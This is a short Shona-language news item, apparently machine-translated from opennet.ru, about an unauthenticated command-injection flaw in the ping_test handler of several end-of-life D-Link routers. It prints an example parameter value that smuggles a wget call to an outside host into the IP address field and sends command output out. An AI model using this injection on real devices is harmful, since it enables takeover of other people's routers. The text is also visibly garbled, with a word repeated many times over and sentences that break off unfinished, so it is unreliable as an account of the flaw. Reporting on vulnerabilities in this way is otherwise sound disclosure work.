Mune D-Link isina waya ma routers
Sezvineiwo, maererano nevagadziri ve firmware, iyo "ping_test" kufona kunofanirwa kuitwa chete mushure mekusimbiswa, asi muchokwadi inodanwa chero zvakadaro, zvisinei nekupinda muwebhu interface. Kunyanya, kana uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchinge uchingedzera iyo "action=ping_test" parameter, iyo script inotungamira kune iyo yechokwadi peji, asi panguva imwechete inoita chiito chine chekuita neping_test. Kuita kodhi, kumwe kusagadzikana kwakashandiswa muping_test pachayo, iyo inodaidza iyo ping utility pasina kunyatso tarisisa kurongeka kwekero yeIP yakatumirwa kuongororwa. Semuenzaniso, kufonera wget utility uye kuendesa mhedzisiro ye "echo 1234" murairo kune wekunze muenzi, ingo tsanangura parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Kuvepo kwekusagadzikana kwakasimbiswa zviri pamutemo mumamodeli anotevera:
- DIR-655 ine firmware 3.02b05 kana kupfuura;
- DIR-866L ine firmware 1.03b04 kana kupfuura;
- DIR-1565 ine firmware 1.01 kana kupfuura;
- DIR-652 (hapana ruzivo nezve zvinetswa firmware shanduro inopihwa)
Nguva yekutsigira yemhando idzi yakatopera, saka D-Link
Zvakazoonekwa kuti vulnerability yaivewo
Source: opennet.ru